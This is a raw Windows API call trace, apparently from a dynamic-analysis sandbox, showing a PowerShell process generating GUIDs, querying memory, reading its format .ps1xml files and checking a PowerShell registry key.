	[0040.163] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xd499087c, Data2=0x78a6, Data3=0x47db, Data4=([0]=0x83, [1]=0xc, [2]=0xe1, [3]=0xb2, [4]=0x29, [5]=0x49, [6]=0xd3, [7]=0xe7))) returned 0x0
	[0040.163] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xa5cba2e8, Data2=0x7d5f, Data3=0x4e1a, Data4=([0]=0x82, [1]=0xdd, [2]=0x8b, [3]=0x33, [4]=0x8b, [5]=0x1, [6]=0x45, [7]=0x49))) returned 0x0
	[0040.163] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x32ecb4ea, Data2=0xa8cd, Data3=0x4b5a, Data4=([0]=0x8f, [1]=0x4f, [2]=0xd1, [3]=0x4e, [4]=0x70, [5]=0x89, [6]=0xfd, [7]=0x95))) returned 0x0
	[0040.163] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1cd26914, Data2=0x963e, Data3=0x4c6e, Data4=([0]=0x8b, [1]=0x56, [2]=0x28, [3]=0x28, [4]=0xaf, [5]=0x24, [6]=0xb0, [7]=0x47))) returned 0x0
	[0040.163] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8a6586d, Data2=0xf29d, Data3=0x4602, Data4=([0]=0x86, [1]=0xb0, [2]=0x8f, [3]=0x8c, [4]=0x38, [5]=0x50, [6]=0xe7, [7]=0x1c))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x2d8a0abc, Data2=0x302, Data3=0x4982, Data4=([0]=0xab, [1]=0x43, [2]=0x6, [3]=0x8e, [4]=0x66, [5]=0x90, [6]=0xac, [7]=0x66))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3e5fcb32, Data2=0xc7f0, Data3=0x4648, Data4=([0]=0x89, [1]=0x46, [2]=0x4d, [3]=0xcd, [4]=0xdc, [5]=0x3c, [6]=0x39, [7]=0x75))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x2094e6ae, Data2=0xb320, Data3=0x4b42, Data4=([0]=0xbd, [1]=0xd7, [2]=0xba, [3]=0x62, [4]=0xe8, [5]=0x74, [6]=0x98, [7]=0x9e))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4be1ba92, Data2=0x8c1a, Data3=0x42c4, Data4=([0]=0x8f, [1]=0x28, [2]=0xa7, [3]=0xee, [4]=0x8a, [5]=0x1, [6]=0xbb, [7]=0x9c))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb44d0418, Data2=0xc4ff, Data3=0x4d7e, Data4=([0]=0x86, [1]=0x5, [2]=0x8e, [3]=0x95, [4]=0xc7, [5]=0xdf, [6]=0x1f, [7]=0xeb))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x2b7278f6, Data2=0x3fa2, Data3=0x47b8, Data4=([0]=0xa8, [1]=0x67, [2]=0x4d, [3]=0x9, [4]=0x95, [5]=0xb9, [6]=0x1a, [7]=0x4a))) returned 0x0
	[0040.164] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x106d90be, Data2=0x31cf, Data3=0x4dc0, Data4=([0]=0xa9, [1]=0x4a, [2]=0x35, [3]=0xf3, [4]=0xf9, [5]=0xca, [6]=0x92, [7]=0xa))) returned 0x0
	[0040.165] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3434fb7a, Data2=0x9392, Data3=0x4f6a, Data4=([0]=0xbc, [1]=0xe1, [2]=0xc6, [3]=0x99, [4]=0xc2, [5]=0x10, [6]=0x80, [7]=0x8f))) returned 0x0
	[0040.165] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4b70be56, Data2=0xbdcb, Data3=0x4e37, Data4=([0]=0x9e, [1]=0xb, [2]=0xa2, [3]=0xcf, [4]=0xcd, [5]=0xc8, [6]=0xb8, [7]=0x7e))) returned 0x0
	[0040.165] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb04b27c, Data2=0x188b, Data3=0x4769, Data4=([0]=0x9f, [1]=0xf4, [2]=0xd6, [3]=0x88, [4]=0x30, [5]=0x13, [6]=0xb7, [7]=0xb1))) returned 0x0
	[0040.165] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x639e1c90, Data2=0x7809, Data3=0x4a73, Data4=([0]=0xad, [1]=0xbe, [2]=0xe, [3]=0x9f, [4]=0x54, [5]=0xfb, [6]=0x98, [7]=0x61))) returned 0x0
	[0040.165] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4078e60, Data2=0xeb16, Data3=0x4e92, Data4=([0]=0xa9, [1]=0x55, [2]=0x10, [3]=0x49, [4]=0x7c, [5]=0xc8, [6]=0x6b, [7]=0x16))) returned 0x0
	[0040.166] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe5ee311b, Data2=0xa2bb, Data3=0x4989, Data4=([0]=0x9e, [1]=0xda, [2]=0xa9, [3]=0x83, [4]=0x6, [5]=0xef, [6]=0x21, [7]=0x4e))) returned 0x0
	[0040.166] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.166] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.168] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.170] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xad691aba, Data2=0x85bd, Data3=0x4f18, Data4=([0]=0xb5, [1]=0x4b, [2]=0xf6, [3]=0xa0, [4]=0x2b, [5]=0xf1, [6]=0x19, [7]=0xd3))) returned 0x0
	[0040.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0040.170] GetLastError () returned 0x0
	[0040.170] SetErrorMode (uMode=0x1) returned 0x1
	[0040.170] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.170] GetLastError () returned 0x0
	[0040.170] GetFileType (hFile=0x300) returned 0x1
	[0040.170] SetErrorMode (uMode=0x1) returned 0x1
	[0040.170] GetFileType (hFile=0x300) returned 0x1
	[0040.171] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.173] GetLastError () returned 0x0
	[0040.173] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.173] GetLastError () returned 0x0
	[0040.174] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.174] GetLastError () returned 0x0
	[0040.174] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.174] GetLastError () returned 0x0
	[0040.175] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.175] GetLastError () returned 0x0
	[0040.175] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.175] GetLastError () returned 0x0
	[0040.175] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x119, lpOverlapped=0x0) returned 1
	[0040.175] GetLastError () returned 0x0
	[0040.175] ReadFile (in: hFile=0x300, lpBuffer=0x2576400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2576400*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.175] GetLastError () returned 0x0
	[0040.175] CloseHandle (hObject=0x300) returned 1
	[0040.175] GetLastError () returned 0x0
	[0040.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0040.175] GetLastError () returned 0x0
	[0040.175] SetErrorMode (uMode=0x1) returned 0x1
	[0040.175] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25973fc | out: lpFileInformation=0x25973fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0040.176] GetLastError () returned 0x0
	[0040.176] SetErrorMode (uMode=0x1) returned 0x1
	[0040.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0040.176] GetLastError () returned 0x0
	[0040.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.176] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.176] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.176] RegCloseKey (hKey=0x300) returned 0x0
	[0040.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0040.176] GetLastError () returned 0x0
	[0040.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0040.176] GetLastError () returned 0x0
	[0040.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.178] GetLastError () returned 0x0
	[0040.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.178] GetLastError () returned 0x0
	[0040.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.178] GetLastError () returned 0x0
	[0040.179] VirtualQuery (in: lpAddress=0x25d0e0, lpBuffer=0x25e0e0, dwLength=0x1c | out: lpBuffer=0x25e0e0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.179] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf0bca631, Data2=0xf217, Data3=0x4b37, Data4=([0]=0x84, [1]=0x99, [2]=0xfb, [3]=0x46, [4]=0xb, [5]=0x2b, [6]=0xb3, [7]=0x66))) returned 0x0
	[0040.179] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.180] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x809d0a9a, Data2=0x9ba1, Data3=0x4cb5, Data4=([0]=0x89, [1]=0x8e, [2]=0xe2, [3]=0x3b, [4]=0xa, [5]=0x92, [6]=0x7b, [7]=0xd6))) returned 0x0
	[0040.180] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xcf30a974, Data2=0x18db, Data3=0x4fe2, Data4=([0]=0x83, [1]=0xca, [2]=0x52, [3]=0x87, [4]=0xb9, [5]=0x2c, [6]=0x76, [7]=0x34))) returned 0x0
	[0040.180] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4f7956bc, Data2=0x2733, Data3=0x4f05, Data4=([0]=0x82, [1]=0x7f, [2]=0xbf, [3]=0x6b, [4]=0x9e, [5]=0x2b, [6]=0x9d, [7]=0x7a))) returned 0x0
	[0040.180] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.180] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0040.181] GetLastError () returned 0x0
	[0040.181] SetErrorMode (uMode=0x1) returned 0x1
	[0040.181] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.181] GetLastError () returned 0x0
	[0040.181] GetFileType (hFile=0x300) returned 0x1
	[0040.181] SetErrorMode (uMode=0x1) returned 0x1
	[0040.181] GetFileType (hFile=0x300) returned 0x1
	[0040.181] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.183] GetLastError () returned 0x0
	[0040.184] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.184] GetLastError () returned 0x0
	[0040.185] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.185] GetLastError () returned 0x0
	[0040.185] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.185] GetLastError () returned 0x0
	[0040.186] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.186] GetLastError () returned 0x0
	[0040.187] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.187] GetLastError () returned 0x0
	[0040.187] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.187] GetLastError () returned 0x0
	[0040.187] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.187] GetLastError () returned 0x0
	[0040.189] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.189] GetLastError () returned 0x0
	[0040.189] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.189] GetLastError () returned 0x0
	[0040.189] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.189] GetLastError () returned 0x0
	[0040.190] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.190] GetLastError () returned 0x0
	[0040.190] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.190] GetLastError () returned 0x0
	[0040.190] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.190] GetLastError () returned 0x0
	[0040.190] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.190] GetLastError () returned 0x0
	[0040.191] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.191] GetLastError () returned 0x0
	[0040.194] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.194] GetLastError () returned 0x0
	[0040.194] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.194] GetLastError () returned 0x0
	[0040.194] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.195] GetLastError () returned 0x0
	[0040.195] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.195] GetLastError () returned 0x0
	[0040.195] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.195] GetLastError () returned 0x0
	[0040.195] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.195] GetLastError () returned 0x0
	[0040.196] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.196] GetLastError () returned 0x0
	[0040.196] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.196] GetLastError () returned 0x0
	[0040.196] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.196] GetLastError () returned 0x0
	[0040.196] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.197] GetLastError () returned 0x0
	[0040.197] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.197] GetLastError () returned 0x0
	[0040.197] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.197] GetLastError () returned 0x0
	[0040.197] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.197] GetLastError () returned 0x0
	[0040.198] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.198] GetLastError () returned 0x0
	[0040.198] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.198] GetLastError () returned 0x0
	[0040.198] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.198] GetLastError () returned 0x0
